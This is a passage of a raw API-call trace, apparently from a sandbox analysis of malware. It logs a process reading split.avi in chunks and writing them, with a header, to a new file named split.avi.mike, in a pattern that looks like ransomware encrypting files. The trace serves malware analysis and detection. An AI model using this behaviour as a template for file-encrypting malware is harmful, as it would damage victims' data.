Shared\\ink\\en-US\\rtscom.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui", lpFilePart=0x0) returned 0x47 [0044.949] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui", lpFilePart=0x0) returned 0x4f [0044.949] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0044.949] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0044.949] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0044.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0044.949] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0044.950] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0044.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0044.950] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.951] GetFileType (hFile=0x264) returned 0x1 [0044.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0044.951] GetFileType (hFile=0x264) returned 0x1 [0044.951] CloseHandle (hObject=0x264) returned 1 [0044.951] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0044.951] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0044.951] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.951] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0044.951] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0044.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.951] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.951] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), fInfoLevelId=0x0, lpFileInformation=0x2178934 | out: lpFileInformation=0x2178934*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25c90f6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x25c90f6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5d08b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2f600)) returned 1 [0044.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.951] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0044.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.952] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), fInfoLevelId=0x0, lpFileInformation=0x2178c38 | out: lpFileInformation=0x2178c38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25c90f6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x25c90f6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5d08b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2f600)) returned 1 [0044.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.952] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0044.952] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0044.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0044.952] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0044.952] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0044.952] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0044.952] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0044.952] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0044.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0044.952] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0044.953] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0044.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.953] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.953] GetFileType (hFile=0x264) returned 0x1 [0044.953] GetFileType (hFile=0x264) returned 0x1 [0044.953] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0044.953] WriteFile (in: hFile=0x264, lpBuffer=0x2179a0c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2179a0c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0044.954] CloseHandle (hObject=0x264) returned 1 [0044.954] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), fInfoLevelId=0x0, lpFileInformation=0x2179538 | out: lpFileInformation=0x2179538*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25c90f6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x25c90f6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5d08b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2f600)) returned 1 [0044.954] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0044.954] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.955] GetFileType (hFile=0x264) returned 0x1 [0044.955] GetFileType (hFile=0x264) returned 0x1 [0044.955] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0044.955] ReadFile (in: hFile=0x264, lpBuffer=0x217ab28, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x217ab28*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.020] CloseHandle (hObject=0x264) returned 1 [0045.021] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.021] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.021] GetFileType (hFile=0x264) returned 0x1 [0045.021] GetFileType (hFile=0x264) returned 0x1 [0045.021] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0045.022] WriteFile (in: hFile=0x264, lpBuffer=0x2185090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2185090*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.022] CloseHandle (hObject=0x264) returned 1 [0045.023] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.023] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.024] GetFileType (hFile=0x264) returned 0x1 [0045.024] GetFileType (hFile=0x264) returned 0x1 [0045.024] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0045.024] ReadFile (in: hFile=0x264, lpBuffer=0x2187ad0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2187ad0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.024] CloseHandle (hObject=0x264) returned 1 [0045.025] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.025] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.025] GetFileType (hFile=0x264) returned 0x1 [0045.025] GetFileType (hFile=0x264) returned 0x1 [0045.025] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0045.025] WriteFile (in: hFile=0x264, lpBuffer=0x2192038*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2192038*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.025] CloseHandle (hObject=0x264) returned 1 [0045.026] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.026] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.026] GetFileType (hFile=0x264) returned 0x1 [0045.026] GetFileType (hFile=0x264) returned 0x1 [0045.026] SetFilePointer (in: hFile=0x264, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0045.026] ReadFile (in: hFile=0x264, lpBuffer=0x2194a78, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2194a78*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.027] CloseHandle (hObject=0x264) returned 1 [0045.027] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.027] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.027] GetFileType (hFile=0x264) returned 0x1 [0045.028] GetFileType (hFile=0x264) returned 0x1 [0045.028] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x5220 [0045.028] WriteFile (in: hFile=0x264, lpBuffer=0x219efe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x219efe0*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.028] CloseHandle (hObject=0x264) returned 1 [0045.029] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.029] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.029] GetFileType (hFile=0x264) returned 0x1 [0045.029] GetFileType (hFile=0x264) returned 0x1 [0045.029] SetFilePointer (in: hFile=0x264, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0045.029] ReadFile (in: hFile=0x264, lpBuffer=0x21a1a20, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21a1a20*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.029] CloseHandle (hObject=0x264) returned 1 [0045.030] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.030] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.030] GetFileType (hFile=0x264) returned 0x1 [0045.030] GetFileType (hFile=0x264) returned 0x1 [0045.030] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x7a20 [0045.031] WriteFile (in: hFile=0x264, lpBuffer=0x21abf88*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21abf88*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.032] CloseHandle (hObject=0x264) returned 1 [0045.032] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.032] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.033] GetFileType (hFile=0x264) returned 0x1 [0045.033] GetFileType (hFile=0x264) returned 0x1 [0045.033] SetFilePointer (in: hFile=0x264, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xa000 [0045.033] ReadFile (in: hFile=0x264, lpBuffer=0x21ae9c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21ae9c8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.033] CloseHandle (hObject=0x264) returned 1 [0045.033] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.034] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.034] GetFileType (hFile=0x264) returned 0x1 [0045.034] GetFileType (hFile=0x264) returned 0x1 [0045.034] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xa220 [0045.034] WriteFile (in: hFile=0x264, lpBuffer=0x21b8f30*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21b8f30*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.034] CloseHandle (hObject=0x264) returned 1 [0045.035] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.035] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.035] GetFileType (hFile=0x264) returned 0x1 [0045.035] GetFileType (hFile=0x264) returned 0x1 [0045.035] SetFilePointer (in: hFile=0x264, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xc800 [0045.035] ReadFile (in: hFile=0x264, lpBuffer=0x21bb970, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21bb970*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.035] CloseHandle (hObject=0x264) returned 1 [0045.036] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.036] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.036] GetFileType (hFile=0x264) returned 0x1 [0045.036] GetFileType (hFile=0x264) returned 0x1 [0045.036] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xca20 [0045.036] WriteFile (in: hFile=0x264, lpBuffer=0x21c5ed8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21c5ed8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.037] CloseHandle (hObject=0x264) returned 1 [0045.038] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 